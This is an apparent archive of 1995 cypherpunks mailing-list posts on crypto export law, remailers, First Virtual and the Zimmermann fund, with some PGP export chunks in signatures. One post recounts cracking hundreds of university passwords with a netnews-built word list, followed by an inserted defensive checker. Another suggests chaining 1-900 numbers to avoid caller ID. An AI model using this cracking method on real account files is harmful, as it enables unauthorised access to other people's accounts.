secure distributed hypermedia environments (e.g., World-Wide Web, S-HTTP,
and SSL), and relational databases to support a variety of electronic
commerce processes.  

Develop applications in support of public key certification authorities.

The first test of an integrated secure email and WWW solutions will be
with CommerceNet members from the electronics industry. Will work with
these members in the Electronics Industry Pilot who wish to reengineer
their Request for Quotation processes using Internet-based technologies.


The ideal candidate will have:

  BSCS or equivalent
  Programming languages (e.g., C, C++), scripting languages (e.g., Perl) 
  HTML, TCP/IP, SMTP and HTTP experience
  Experience with relational databases is desirable
  Experience writing CGI applications for the World-Wide Web
  Experience with public key and symmetric cryptography



If you are interested,  send your resume via e-mail to eit-jobs@eit.com or
you can fax your resume to (415) 617-8019.  Please indicate the
requisition number of the position for which you are applying.

If you want to mail us a resume, please send it to: 

Enterprise Integration Technologies   
800 El Camino Real 
Menlo Park, California 94025
EOE,  Principals only please




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Tue, 25 Jul 95 01:53:30 PDT
To: cypherpunks@toad.com
Subject: The Big Win (doze)..A simple explanation
Message-ID: <199507250853.BAA25871@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that I've gotten Eudora back, I found this
totally simple explanation to it all.
It came from Doc Ozone via a via a via

So.....

>>You make the call...
>>
>>Be seeing you,
>>
>>~ronC
>>
>>------- Forwarded Message
>>(via mmesser@infinity.com).
>>
>>  Given Microsoft's recently announced acquisition of the Roman Catholic
>>Church, I find the following message, received earlier today, extremely
>>distressing.
>>
>> ---------------------------------------------------
>>
>>The real name of "the" Bill Gates is William Henry Gates III.
>>Nowadays he is known as Bill Gates (III), where "III" means the order
>>of third (3rd.)
>>
>>By converting the letters of his current name to the ASCII-values and
>>adding his (III), you get the following:
>>
>>B       66
>>I       73
>>L       76
>>L       76
>>G       71
>>A       65
>>T       84
>>E       69
>>S       83
>>+        3
>> --------------
>>       666 !!
>>
>>Some might ask, "How did Bill Gates get so powerful?" Coincidence? Or
>>just the beginning of mankind's ultimate and total enslavement???
>>
>>YOU decide!
>>
>>Before you decide, consider the following:
>>
>>M  S  -  D  O  S     6  .  2  1
>>77+83+45+68+79+83+32+54+46+50+49 = 666
>>
>>W  I  N  D  O  W  S  9  5
>>87+73+78+68+79+87+83+57+53+1 = 666
>>
>>Coincidence?  I think not
>>
>>------- End of Forwarded Message
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 24 Jul 95 22:00:26 PDT
To: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <3v1j6h$fge@blaze.cs.jhu.edu>
Message-ID: <m0safl4-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text



> : How about compiling it? THAT is "further processing"......

> Perhaps...but I for one wouldn't trust anyone else to compile my copy
> of PGP...would you?
Not at all. But who says I must USE the compiled version?
I get Linux with both source & object on one CD. Pick & choose as I
please....

> And, note, it says substantial change in value...I don't know if this is taken
> to mean monetary, or usability...the latter might work.  
Or offer many compiled versions, with source tree.
	Comes complete SYSIII, LISA, PET and
	TRS-80 versions!!!!!

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 25 Jul 95 02:46:14 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
Message-ID: <9507250946.AA01832@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Could we end this series of irrelevancies, please? This is not
ConspiracyPunks, this is cypherpunks. We deploy cryptography, not
random conspiracy theories.

.pm

Brad Dolan writes:
> 
> 
> ---------- Forwarded message ----------
> Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> From: KALLISTE@delphi.com
> Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>    Allegations Regarding Vince Foster, the NSA, and
> 	 Banking Transaction Spying, Part IX 
> 
> 		  by J. Orlin Grabbe
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 25 Jul 95 06:30:09 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: community standards in cyberspace (fwd)
Message-ID: <Pine.SUN.3.91.950725092525.9614A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nice thought, but... well... I wish the congresscritters thought that way...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

---------- Forwarded message ----------
Date: Mon, 24 Jul 1995 22:49:43 -0700 (PDT)
From: Tildy Bayar <tildy@ella.mills.edu>
To: bdsm-list@blob.best.net
Subject: community standards in cyberspace (fwd)

> [excerpt]
> 
> DEVIANCE -- COMPARED TO WHAT?
> Peter Huber, author of "Orwell's Revenge" and senior fellow at the Manhattan
> Institute, points out that "community standards" are no longer definable in
> cyberspace.  "`Deviance' loses its meaning, when communities of the
> like-minded are formed entirely by consent.  Freedom of association is so
> complete in cyberspace that traditional limits on freedom of speech become
> almost impossible to justify constitutionally."  (Forbes 7/31/95 p.110)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 25 Jul 95 08:17:01 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
Message-ID: <9507251516.AA21669@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> : marc:
> : > However, goods of U.S. origin are export restricted, unless said
> : > goods are further processed outside the U.S. so as to result in a
> : > substantial change in value, so some of the PGP development would
> : > need to be done in Canada.
> 
> : How about compiling it? THAT is "further processing"......
> 
> Perhaps...but I for one wouldn't trust anyone else to compile my copy
> of PGP...would you?

I would use a precompiled version of PGP *if* it came from
and was signed by someone I trusted.
After all - I don't read all the source code - do you?

> And, note, it says substantial change in value...I don't know if this is taken
> to mean monetary, or usability...the latter might work.  
> It's an interesting idea.
> Jeremy
> 
I would say that if you can sell something that people
would otherwise get for free, then you have added value.
So, pre-compile for a couple of architectures, and then
slap them on a CD-ROM with source.  
Definite tangible value from the CD-ROM then.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 25 Jul 95 10:45:21 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: CALLER ID AVOIDANCE
Message-ID: <199507251742.KAA13448@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > If one can afford it, I suggest chaining through 
>> > 1-900-CUT-TRAX  and  1-900-STO-PPER

I thought that at least 1-900-stopper kept logs in case they got
subpoenaed or sued or had billing disputes or whatever?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 25 Jul 95 10:45:22 PDT
To: Ray Arachelian <an253398@anon.penet.fi>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507251742.KAA13464@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>  0. Mobsters still get caught and thrown in jail.
>  1. They don't use crypto at all.  All records are in the open and 
>searchable.  LEA's wet dream.
>  2. They use strong crypto and can't be caught at all.  LEA's nightmare.
>  3. They use crypto, but are still catchable (oops, the secret is out of 
>the bag now, cancel all the computer related RICO nonsense.)
>  4. They don't use crypto, but keep no records, or hide them well.  They 
>can still be caught by LEA's.
>
>  3 & 4 are the most likely, and the LEA's shameful little secret.  They 
>cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not 
>wolves.  

Nah, they're hunting sheep, and they've been pretty successful so far.  
Right after the OKC bombing, Freeh was saying that he needed to ban
encryption and get more funds for Digital Telephony to stop terrorists.

2 isn't credible, except for purely-data crimes like money-laundering,
tax evasion, and conspiracy.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 25 Jul 95 09:11:10 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <m0sZZTz-001Bg4C@passport.ca>
Message-ID: <9507251610.AA16331@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <m0sZZTz-001Bg4C@passport.ca> Craig Hubley writes:
>Any time the Supreme Court strikes down a law, any politician who has been 
>found to have voted in favor of three such laws is immediately stripped of
>all offices and rendered ineligible to run for public office ever again,
>at any level.

This might be nice, but questions of "upsetting the system of checks
and balances" aside, you can't do it.  It would violate Article I,
Section 6 of the Constitution, which says that "for any speech or
debate in either House, [the Senators and Representatives] shall not be
questioned in any other place".  "Speech or debate" would cover the
vote on any question.

Therefore, the only organization which can hold a
senator/representative liable for passing a bad law is the one which
passed the law. :(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jhames@deltanet.com (Joel Hames)
Date: Tue, 25 Jul 95 11:38:11 PDT
To: cypherpunks@toad.com
Subject: Questions about Conferences
Message-ID: <9507251837.AA29943@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


As a relatively new person to cryptography, I am trying to read and
research, as well as follow this list, everything I can about the
subject.  Because of this interest, I have a few questions for the list.

1)  What is Defcon?  I am not that far from Las Vegas and am interested
in the conference and how I might attend.

2)  Similarly, how would I get information on Crypto '95?  I have read
the papers from previous years and I would be interested in running up
to Santa Barbara to check it out.

And on a different note,

3)  Has anyone heard much about the security of First Security National
Bank? (www.fsnb.com)  I checked out what they have available already and
it seems well put together.  I realize they haven't released the "white"
paper with specific security (cryptographic) specs on it yet, but has
anyone heard anything yet?  If it is as secure as it claims, I might
consider opening an account with them.

Thanks,

Joel Hames
jhames@deltanet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 25 Jul 95 11:41:14 PDT
To: cypherpunks@toad.com
Subject: Remailer economics, Java & remailers
Message-ID: <v02120d05ac3aed03cbdc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



In a previous post I mentioned that in a remailer economy, remailer
users should have the opportunity to earn pre-paid service tokens by
acting as part of a remailer network. I also mentioned that this had
the benefit of providing cover traffic for the remailer user's own
activities.

Some people pointed out that their ISP agreements forbid them to
run remailers (!), and that not everyone is willing to tackle the
(as yet undetermined) legal liability or risk of general legal
hassle (which we've seen so far) of running a remailer.

First of all, the user client should present the user who wishes to
earn service tokens with the choice of registering as a terminal
or non-terminal remailer link. People get paid more to be terminal
links, since that's the person who is most likely to get hassled.

Second of all, most of the attacks on remailers, as well as any
ISP technique for detecting them, are based on some remailer's use
of SMTP which is a logged service operating on a known port. This
would be avoided by coevolving Mixmaster with "remailing bandwidth
and reputation" servers (spiritual descendents of Raphe's remailer
pinging service).

Something which is taking a small step in this direction is the
WWW front end to remailers available at c2.org as:
http://www.c2.org:80/remail/by-www.html. Note that it has
lots of security problems, but it has interesting conceptual
aspects (it is also extremely easy to use.)

Note that if one were using Java, one could fetch the application
via Netscape, and run it within an HTML document in a Netscape
window, but the sending of the mail could be done using any
appropriate network port or protocol without routing back through
the server where the document came from -- the applet would just
open socket(s) as appropriate and go for it. (Depending on the
user's security settings, a variety of "is it ok for this applet
to do such-and-so" messages may be displayed.)

My gut feeling is that serious remailer users and operators will
ultimately want a standalone application (which can still be
written in Java, and share code with the applet version), but that's
a religious war we don't need to get into again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 25 Jul 95 09:59:56 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507250455.AAA13908@bb.hks.net>
Message-ID: <9507251659.AA16288@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199507250455.AAA13908@bb.hks.net> Lucky Green writes:
>
>In article <m0saTpk-0005BTC@nrk.com>, wb8foz@nrk.com (David Lesher) wrote:
>
>>marc:
>>> However, goods of U.S. origin are export restricted, unless said
>>> goods are further processed outside the U.S. so as to result in a
>>> substantial change in value, so some of the PGP development would
>>> need to be done in Canada.
>>
>>How about compiling it? THAT is "further processing"......
>
>I am not sure that would hold. After all, the disk with the source code to
>"Applied Cryptography" was denied an export license, because the source
>code could be compiled into libraries.

So?  The ITAR doesn't control export to Canada.  Export the source code
to Canada, compile, validate, sign, and put on CD in Canada, and export
to the world.

I also seem to remember a while back (Mar/Apr) someone reported here that the
Canadian bureaucrat responsible for executing import/export rules said
that he didn't consider crypto to be restricted by Canada's rules.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 25 Jul 95 14:43:53 PDT
To: cypherpunks@toad.com
Subject: PGP message and keyring format
Message-ID: <199507252142.OAA10281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of any documentation describing the format of PGP
messages and keyrings, so that other applications can send and receive 
PGP-compatible messages and work with PGP keyrings?

Thanks for any info..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 25 Jul 95 11:48:29 PDT
To: jhames@deltanet.com (Joel Hames)
Subject: Re: Questions about Conferences
In-Reply-To: <9507251837.AA29943@deltanet.com>
Message-ID: <9507251848.AA20053@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel Hames writes:
> 1)    What is Defcon?

Some hacker convention. It doesn't have anything to do with crypto per se.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 25 Jul 95 13:28:05 PDT
To: cypherpunks@toad.com
Subject: Defcon agenda
Message-ID: <Pine.SV4.3.91.950725152522.1476A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can some kind soul forward me a copy of the agenda for Defcon? I need 
dates and times for the various speakers.

Thanks,
Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBVTh+5wXwthmZO1AQGMvgQAhB5RANbZTSPBX+mvdhMiUCnmY2tlYWC3
kTeZc9WNv0qAQSUaYZE0www8pu+X2pZhRaQOKFgbB5cnHvwxoWdgCMj6O8rmDT9X
ft/cgB1cls/EOHOysZdPzzx3en+aVM9EedXpLrsx53uTzaG5SHTWVOfY4nexO65e
HCTFO93Ct1I=
=nNPb
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 25 Jul 95 12:42:28 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <199507251941.PAA28975@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 7/22/95 -0400, Rich Salz wrote:
>Better yet do it the way Comedy Central wanted to:
>	Three strikes you're out and term limits.  You can run for re-election
>	but if you lose you get shot.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 25 Jul 95 13:11:14 PDT
To: cypherpunks@toad.com
Subject: R. v. Pecciarich decision is online (fwd)
Message-ID: <m0saqJ9-001BjvC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From insight.mcmaster.ca!efc-talk-owner Tue Jul 25 13:23:44 1995
Date: Tue, 25 Jul 95 13:09:49 EDT
From: djones@insight.mcmaster.ca (David Jones)
Message-Id: <9507251709.AA09853@insight.mcmaster.ca>
To: efc-talk@insight.mcmaster.ca
Subject: R. v. Pecciarich decision is online
Sender: efc-talk-owner@insight.mcmaster.ca
Precedence: bulk
Reply-To: djones@insight.mcmaster.ca (David Jones)
X-Efc-Web-Site: http://insight.mcmaster.ca/org/efc
X-Efc-Archive: gopher://insight.mcmaster.ca/11/org/efc
Content-Type: text
Content-Length: 373

The judge's decision in the recent "Pecciarich case" is now available
online.  Apparently, this is Canada's first conviction for distributing
child pornography by computer.

	R. v. Pecciarich [1995] 22 O.R. (3d) p.748-766

HTML	http://insight.mcmaster.ca/org/efc/pages/law/court/R.v.Pecciarich.html
TEXT	gopher://insight.mcmaster.ca/00/org/efc/law/R.v.Pecciarich.06apr95




-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 25 Jul 95 13:29:05 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <199507252027.QAA08468@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 7/22/95 -0400, Rich Salz wrote:
>Better yet do it the way Comedy Central wanted to:
>	Three strikes you're out and term limits.  You can run for re-election
>	but if you lose you get shot.
>

Or even better -- Gilbert and Sullivan's solution in "Utopia, Ltd."  Despotism Tempered by Dynamite.  Utopia, Ltd -- the South Sea Paradise that organized itself as a joint stock company -- was originally governed by an absolute despot whose despotism was kept in check by the existence of a Public Exploder.  The Public Exploder's job was to blow the King up if he began to oppress the people.  The exercise of his office was kept in check because if he blew up the King, he had to replace him.

http://diamond.idbsu.edu/GaS/utopia/

DCF

"Calynx:  Yes.  After many unhappy experiments in the direction of an ideal Republic, it was found that what may be described as a Despotism tempered by Dynamite provides, on the whole, the most satisfactory description of ruler--an autocrat who dares not abuse his autocratic power."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 25 Jul 95 14:48:53 PDT
To: cypherpunks@toad.com
Subject: Re: PGP message and keyring format
In-Reply-To: <199507252142.OAA10281@jobe.shell.portal.com>
Message-ID: <9507252148.AA16643@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Does anyone know of any documentation describing the format of PGP
> messages and keyrings, so that other applications can send and receive 
> PGP-compatible messages and work with PGP keyrings?

RTFM. The document you seek is actually in the distribution.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Tue, 25 Jul 95 12:07:59 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: big word listing
In-Reply-To: <199507242154.OAA05021@comsec.com>
Message-ID: <199507251751.RAA00418@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


% | see if the password is in it.  My question is, are there any pre-built lists of
% | this nature?  I am currently only using a spelling dictionary, and would like
% | something a little bigger.

I made one really easily once with a tiny awk program that read files
and remembered all the words (in a big table, with the old
``table[word]=1'' trick, then iterate the table and print it out).  
I probably used 'tr -cd' in front of it to get rid of non-alpha stuff.

I fed it netnews -- especially hierarchies with folklore, unix,
rec.all, sex, etc.   And it made a dictionary that cracked several
hundred passwords (from a Major University /etc/passwd) in about 24
hours of SparcStation II time (I think ... this was six years ago).

I remember finding the word 'creat' -- doubtless obtained from the unix
wizards group -- and a whole family of machine-generated accounts whose
password was 'pw'.  I'm not sure these words exist in dictionaries, but
they do in netnews and passwords.

anyway -- it's fun to make your own.

	strick
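
Added example (not part of strick's post): the same word-table idea used as a check at password-change time, written in Python rather than awk. The sample text, function names and variant rules are constructed for illustration.

```python
import re

# Constructed sample standing in for the netnews text the post describes.
SAMPLE_TEXT = """\
From: wizard@unix.example
Subject: Re: creat() vs open() with O_CREAT
The creat call truncates an existing file.  Some sites still ship
machine-generated accounts whose password is pw -- check yours.
"""


def build_word_table(text, min_len=2):
    """Remember every distinct word, like the awk table[word]=1 idiom."""
    table = {}
    # Turn every run of non-letters into a space, then split on whitespace.
    for word in re.sub(r"[^A-Za-z]+", " ", text).lower().split():
        if len(word) >= min_len:
            table[word] = 1
    return table


def candidate_forms(password):
    """Forms to look up: lower-cased, edge digits stripped, and reversed."""
    base = password.lower()
    stripped = base.strip("0123456789")
    forms = {base, stripped, base[::-1], stripped[::-1]}
    forms.discard("")
    return forms


def rejection_reason(password, table):
    """Return the table word the password reduces to, or None if none."""
    for form in sorted(candidate_forms(password)):
        if form in table:
            return form
    return None


WORDS = build_word_table(SAMPLE_TEXT)

if __name__ == "__main__":
    for proposed in ("creat", "pw", "Creat95", "k7#Vq!unrelated"):
        print(f"{proposed!r:20} -> {rejection_reason(proposed, WORDS)}")
```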






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 25 Jul 95 15:03:21 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmerman legal fund
In-Reply-To: <23424.9507181545@exe.dcs.exeter.ac.uk>
Message-ID: <gk5Ka3_Mc50eIssw1J@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 23-Jul-95 Re: Zimmerman legal fund
aba@dcs.exeter.ac.uk (5163)

> Anon writes:
> > Could someone in the know talk about the relationship between FV and
> > the ZLDF? I don't like to spread misinformation, so I won't answer
> > based on conjectures.

> I'd be interested to hear this too, but what I am concerned about is
> that the whole thing is too strongly tied to first virtual.

The relationship is a completely open and friendly one, without any
strings attached that I'm aware of.

What most of you probably don't know is that FV has been a supporter of
Phil Zimmerman's since long before you heard of us.  We have had Phil on
a monthly retainer since before the public rollout of our service (which
probably means since before you even *heard* of First Virtual, since we
didn't make any vaporware announcements).  We've done this in order to
get some advice on cryptography and some help with some specific needs
(pgp-telnet, for example), but mostly we've done it because we thought
he both needed and deserved our support.

Why would a startup company want to devote significant resources to
supporting Phil?  Basically, we felt it was the right thing to do,
particularly in our case.  Here's why:  like most net citizens, we
believe that the people deserve free access to cryptography.  However,
we had just invented something nobody had ever imagined before -- a way
to do reasonably safe net commerce *without* cryptography.  Now, we
thought this would be a good thing for society in its own right, for
many reasons that would be a real digression here, but we recognized
that every technology has both a good side and a bad side.  Insofar as
electronic commerce was going to be the motivating factor for permitting
universal access to cryptography, FV's technology is/was a bad thing,
because it decreases (at least somewhat) that motivation.  We believe
the positive features of our technology outweigh this negative, but we
also felt we had a moral duty to lend our support to public access to
cryptography, to try to offset any negative effect that our invention
might have in that regard.

So, FV has been a friend of Phil's for a long time.  We launched the
Yellow Ribbon campaign and the FV-based fundraising drive in that
spirit, though clearly it doesn't exactly hurt us if people sign up for
FV in order to donate to Phil.  That really wasn't our motivation,
however, and we sought to underscore that fact by making a donation to
Phil's defense fund every time people sign up for a new account
expressly in order to donate to ZLDF.  In other words, if you are a
Zimmerman supporter and you were thinking it might be nice to have an FV
account anyway, you can help Phil even more by signing up and paying
your $2 fee through the ZLDF pages.

We've had lots of discussions with Phil Z and Phil D, and any time they
expressed any discomfort with any of our ideas, we dropped them.  There
are two web sites basically because they are taking care of the
informational aspects and we're concentrating (pro bono) on the online
fundraising aspects.  If we've overly stressed FV as a collection
mechanism, I apologize, but you must bear in mind that we've been living
and breathing the FV payment system for 18 months now, and it would be
kind of hard for us not to even *mention* it.  :-)

> I mean there was the Yellow Ribbon Campaign but all URLs out of that
> page point to FV, no mention of the at least two other (more
> convenient for most people, and hence in Phil Zs interests) methods:

> a) PGPed email CC no. to Phil Dubois (Phil Zs chief legal counsel)

> b) similar PGPed email CC no. to some guy in Europe who was offering
> to collect up all of the European donations, and send them to Dubois
> in lump sums to save on currency exchange costs.

Well, only on the cypherpunks list would you be likely to find general
agreement that PGP'ed credit card numbers are "easier" than First
Virtual.  Many thousands of extremely naive net citizens are now happy
FV customers, and I seriously doubt that most of them could master PGP
without a full-day tutorial.  (We're not talking about rocket scientists
here, folks.)

Mostly, though, I felt that the FV/ZLDF association was extremely
important to defuse any potential political arguments of the form "FV
has proven that public access to crypto is unnecessary."  Such arguments
would hurt the crypto cause, and would NOT sit well with the FV team,
either.  The truth is we're completely on the same side of this issue,
folks.  No hidden agendas, I promise.  

On behalf of First Virtual, I encourage everyone to donate money to
ZLDF, using any mechanism that works.   Better yet, use them all.  --
Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net (http://www.netresponse.com/zldf)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ncra@ix.netcom.com (NCRA )
Date: Tue, 25 Jul 95 18:20:20 PDT
To: cypherpunks@toad.com
Subject: DOS Script Programming Request
Message-ID: <199507260118.SAA19016@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


To any interested party:

I need 3 simple DOS scripts to be written or translated from a UNIX 
script to DOS. The scripts need to do the following:

1) Look into a specific directory and execute a .bat file that will 
sign and encrypt the file(s) in the directory using Viacrypt's PGP and wipe 
out the original.  It then needs to move the cyphertext file(s) to a 
second directory.

2) The second script needs to log on to a netcom account, enter user id 
and password and upload the cyphertext files in the second directory 
using Z-modem transfer.  The netcom account is already programmed to 
mail the files to the correct address.  It then needs to logout and 
move the transferred files to a third directory.

3) The 3rd script needs to delete all files in the third directory that 
are over 15 days old on the 1st and 15th of each month.

The first two scripts need to run on a timer and in sequential order on 
a daily basis.  

That's it.

If you are interested, let me know and I will fill you in on specific 
details. Also include a proposed charge for the programming.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Tue, 25 Jul 95 16:47:21 PDT
To: support-payout-failure@card.com
Subject: You have cashed my check....
Message-ID: <Pine.BSI.3.91.950725170206.8971A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear First Virtual,

You now present puzzling information.

You have cashed my check.
So why are you telling me that you have no bank information?
You stated that the check itself provided the bank information.
If this situation persists,
I will forward said materials and
correspondence to the State of Minnesota Attorney General's Office,
and the U.S. District Attorney's Office for prosecution.
For what you have communicated so far surely appears fraudulent.

I don't have much money as it is. But then maybe (considering all of
the lag time) this is your scam. Maybe this is entirely legitimate,
and just an honest mistake.

I have added below your opening correspondence of July 18th, the day 
before the check cashed.

Awaiting your response,

Carol Anne Braddock

Exhibit #1 - Acct. Acceptance Status

From carolann@censored.org Tue Jul 25 17:50:44 1995
Date: Tue, 25 Jul 1995 17:24:22 -0500
From: UnCensored Girls Anonymous <carolann@censored.org>
To: cab@censored.org

X-UIDL: 805661824.000
From: sgcs-server@card.com
To: carolann@censored.org
Y-Tag: 950611397619
Subject: newacct-result
Comments: generated by via-btl.tcl - Enabled Mail (EM) environment for UNIX
Date: Mon, 10 Jul 1995 15:35:00 -0400
Reply-to: support-newacct@card.com
X-Status: 


